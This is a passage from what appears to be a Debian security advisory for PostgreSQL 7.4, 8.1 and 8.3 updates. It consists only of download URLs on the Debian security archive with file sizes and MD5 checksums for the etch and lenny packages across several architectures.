32bbf38145049e0d4bb254367e8c5f05\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_sparc.deb\n Size/MD5 checksum: 132300 3ad5d1a0540c7fb20704baf70d323be7\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_sparc.deb\n Size/MD5 checksum: 1111328 4d005aebebbc91f4393b3bcd8b22af61\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_sparc.deb\n Size/MD5 checksum: 583614 1e51c128792597865b0b24fb4f61d7ca\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 199512 207f3f4ad1bdc33f801ebe90acad2a68\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 1463082 16c516c4097f434b411d85d537110df8\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1.dsc\n Size/MD5 checksum: 1665 1ef1bcb1f66dbf3aaedaa438ca96c6ae\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9.orig.tar.gz\n Size/MD5 checksum: 13850244 05088ab3b924a326914572eb77db541b\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1.diff.gz\n Size/MD5 checksum: 45140 0ab48c65a1c42e677e63c49a3198b65b\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client_8.3.9-0lenny1_all.deb\n Size/MD5 checksum: 247808 063f66f5cde6932b9ce8565ec618b259\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql_8.3.9-0lenny1_all.deb\n Size/MD5 checksum: 247844 bb2a8b43ddcfd84d36534748fa282867\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc_8.3.9-0lenny1_all.deb\n Size/MD5 checksum: 247646 92f36e64dd46940994d3d6679c5a370e\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib_8.3.9-0lenny1_all.deb\n Size/MD5 checksum: 247706 fcef243b109aadb0afe5e24af72fadfd\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.9-0lenny1_all.deb\n Size/MD5 checksum: 2155508 b0c862dd5a120683369859f098d58968\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 268236 67d08614516d9fa9e541f9c4da665f08\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 276772 23beca661eef639bfe73b0fb009f1db2\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 277714 3e173bec97c21b5ac451d1b2bd77ec94\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 5264286 0e026501523bcea7ab4401bf2f788aa3\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 1697648 e3e1c2f04947f2ade0d08c1b787911cc\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 275058 a198e915f70df2b364dcda6ad5b908cd\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 472794 e70e51b2bc70bbc93f876cd00f110c92\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 256766 ec01e3db1cfe18ce40a724e8f6157a1d\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 613852 1726b3c840ec56ddd77cd7d7533520d3\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 384382 27c62775ddbdc3347340fe6bf44391ea\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 821962 118a2dc034ebd1fcc079626ee61e2be0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 471076 b1a90b3d1add497c9a49142b6531fcdc\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_alpha.deb\n Size/MD5 checksum: 266582 cc36f36bc42e0f990a19e9eb76ba0592\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 453356 0f170ff7a42e00af152f9c2b288ea88a\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 612226 419b3c3e0d4a1a0437b0dc4e1dd30d9c\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 276816 428d8d2cd20a122d65142340ec32c5b0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 277180 372ba7ae746ad62c6f59802d33a9ac1f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 466152 be4b24213d66e253af05ce6698422d9e\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 255740 8aa35e6a113374523a539798b03696bf\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 266560 ce5f990d90315f81e97a734f34f3b09d\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 1694580 11320c18bd0009df66155e9b491a56d0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 275448 c76f8848b2af512762cf888d1970829d\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 820824 9d43519ae4ab99c386f1116b9e83536d\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 5358478 636871575bcb4ac4c4a6e129e40bd206\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 385386 f6e759bac3f1470402c5c5c10cff27de\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_amd64.deb\n Size/MD5 checksum: 269122 8dc1266cc5b9aa1c1b9a475f24121f9b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 268358 9feff9b13a174308a523816cd8df8347\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 819744 5fcc6b29493cd27998383d77b4101d6c\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 254848 9fc372e347d832ed9ce3ed65c1c68c67\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 273360 47645bf95018da752fd0107e955987af\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 274128 acadf9d955e64374b4fe263bed0c8ffa\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 275610 dcc757493a2f5a452907e125e002beba\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 5228322 0b619f90803de6d2a67f33c1f76bda07\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 1654210 880ce8f91d9166ed49d4ef463d1c7c41\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 437154 9a08d0d937134bbc623c48e4a4510d8e\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 370840 0aad586eb653fadd50118b505cee355d\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 573360 2026f6813a891888e4b66c07a2643cd5\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 457392 6326a5d61707df865ac38667da8b423b\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_arm.deb\n Size/MD5 checksum: 266690 e3717d1cbef771dc89681a4165e8ce68\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 589414 20adb8c4bbfc74dd9de0407ecbda21d2\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 254102 c3f25fd9d8630debd69b12da80744bf8\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 460916 0b4279a134ea8c5454e64b28bfc2a507\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 438588 a455e0aabe69a7330b8c09f7fc78c93f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 275652 7bc6157e27defed8cc723a4b8cd73baa\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 273494 a89eb629078aca49e88ac4a5f9c8d2d7\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 371282 1b8d703dfc4eb140d650e2f8661601c3\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 266590 93de12082a928c733ea80ad48165f787\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 5241054 85458f8aa6e629db949a4dd821715e4f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 817072 e95fa7f20e042a8f4771434b615de808\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 268524 a12f6519c56fc1eb7afd1bcab96c68a4\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 1657656 0e09164c856630b94937cb0b798bd700\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_armel.deb\n Size/MD5 checksum: 277794 bc5897df27ac2e8fca54ada8ff2d0496\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 825804 755128b0755b300160aee49985dbfd8a\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 270906 7e69604f167617e42073933381225a90\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 387260 6581800d34f0c87e7b4f42ae771445f1\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 277208 bb6bb3b8a648577fa7a7747d46439480\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 5810012 0abf86785c5e84f6db3ecf02dbd63d52\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 1730960 2475adb8bd96a240285dfc9147fcc5d8\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 256260 dd8ec5c44c48ac7066ae6a13155cfc19\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 627006 adf80e94f9fe38118836e40b69fe1cf8\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 281696 c73a56bb16889711c3479f6e391b39ab\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 456164 65a263005534e60de18495bc6e7503be\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 279924 a6b1cf995465256bc93a566d9f238795\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 473108 ccf5fc6be7313fda853f94e02c0b9a64\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_hppa.deb\n Size/MD5 checksum: 268172 7c91fda5b7851e066a51bd88f4d29a18\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 254864 0a2a7133b674bab426787ed16cb98ee5\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 265352 bea561d80fddd839554d3ca6c93d9ae0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 819722 559ea45c296e95648357fd543ee5e9f0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 1664860 137f4ca86aab020004fbfaa0b8664bef\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 275768 4f0e17c03222cb633769cfff540f93e5\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 273536 d8762bca2f54744fbc4783db6ae74708\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 5237200 bea3a11c86370a7cb86471c70e387f1f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 441474 7e3641bd006806bac083ff9108c56f16\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 276428 372deb0521a5c848d745d628c5fa4e3b\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 576904 08c665f45f01603dcb4809bfaa926050\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 458124 5e4ebbede87bbb425c56802c53b7fbfd\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 266374 0f02afd659d1d32957ff4ad039c91fc6\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_i386.deb\n Size/MD5 checksum: 376552 9c96aef09b3c784e45c891942d135bfc\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 287750 b12d21e25f08988655d1995c9a6c30fc\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 1876570 eeb376c9abe35a009436615477b55483\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 518902 1e18303a8ffc51b64d897c8057d25ae6\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 728374 147f2d1cfa9bc6a5fdcaff54c16673f0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 281808 0448d4d77f6c39e302054c96de37d6f6\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 407882 dac8564fb7863d71cded2b8a78ca6515\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 6271492 708b76a16b8f9729d27e09315c2c1ce5\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 288482 609e72efae4c72b6642261822040255f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 273448 3cf01c7726cbabb522aa98c72b7aec8f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 258064 b506ee2e72ccd92f0ecab42885765cfe\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 828776 d6d443268b873f899541cbc4b3a80b31\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 293440 a074cfc38a5e4f85051ad2650282cf86\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_ia64.deb\n Size/MD5 checksum: 492890 3eabf7babd973be9808985d47afa9dda\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 5558868 8c5bb0c43379c9989e77a56f51601fa7\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 269314 05d8a1b09a5f04b6c09ad7c632d66926\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 814044 731002e6f7a208b3f211fd7ea600467f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 267238 f02828c3072f3d7cd9b3bfccd077b3ad\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 1677092 fdd7ef4583e68c3c00ba0dd8bb45d7be\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 265734 31337550d9e4fe179ec27a2c2584f9eb\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 278050 90e6d07a377ce6b91574dcb5313cf758\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 275270 656bb23c9c559bfb2104e7757763ae8c\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 455686 f67f0c0132430e5f404cd4cfe21b3955\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 456702 1cb46822405d61a5405c51aacaa6c1d8\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 577224 aba62d997ab9fdef1e69d9cc63c97a6a\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 254556 dca2b9eb54900eb84580f974bab4a510\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_mips.deb\n Size/MD5 checksum: 376068 718801a51539264bdc9bf0fd72b05794\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 269142 362ac2d4bcb8d3cfb3c571c4317f76c2\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 573472 98e304223f757a311e113f9d38783754\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 1675002 a1d8d37d397ec768bdfd21eeeb1bb1b0\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 267118 e37ca6adaf9ba2b334dca715f33ff773\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 254506 f6a10c8e7cae388fc0a2df4705500f88\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 455832 208e627ca4f6715624cb6f2b68177885\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 453804 12c285c889305433f8845bfb76e891f8\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 275190 a3bddbd63abb6e75ed17258c34807f1f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 277998 1f1476fd6ba61c7186a5644fb7bb74a2\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 265710 59791d423f233cddb85ed67c6012cd5b\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 814040 0d6f87e8b026f83598f65491a436be47\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 376096 7d4705265e33d6b0ddbf5d5c8a76f8a9\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_mipsel.deb\n Size/MD5 checksum: 5211194 22928b5b6576e8e7346e1472e18c8893\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 452678 c48c7df0dae91237abb4a362f0c6a7c5\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 255436 3e5729e6b9cb980126ad71edbdb36776\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 461396 0dfed32510c56f5a80a3dbb39510cd37\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 270738 e4d797f8dd6dc4c32a0a7e63947e08b3\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 382944 138cfa8981a85448b1f6e262534cd745\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 268902 623d6a1ab733ab60d0a89026ff40212f\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 1723214 ed5646eff9309dd711ce56cb4834b3cf\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 279498 65317441c45d7950e775e238351f13ab\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 658764 a7cbbcfa38695520d074eae171a48f9e\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 823298 8c93be6d8467699fd8bcc5f57837b185\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 5703432 63de08b404991e67edc08fb4046aa05e\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 277626 6097d9bbc3003e6786afc2b590a933a1\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_powerpc.deb\n Size/MD5 checksum: 276522 8b34023b66c36d4872fd5f25d1fceda0\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 470798 ac80ee42e8cbaf1db50baf39f9a5bb96\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 815848 f0d01cf7e6c265653307c4af1c78db84\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 1715234 75941fec73004909fa901f812ec503e6\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 269414 a35e2e63213cd96379cbb7336db96597\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 619478 6f45509c5ffd7950d25e38e61b8ae432\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 455518 be1ed544c9c801b3c74c331d998d3395\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 273252 0f8f813ca5e0487ff823784a27656c91\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 384350 145e02b86ab1a3e5eaf553c76617c425\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 278550 2e02a8feb0322cfb93a5cb2dfe1b1887\n http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.9-0lenny1_s390.deb\n Size/MD5 checksum: 278328 98dac5a8fd8c8d73fab97f777b805481\n 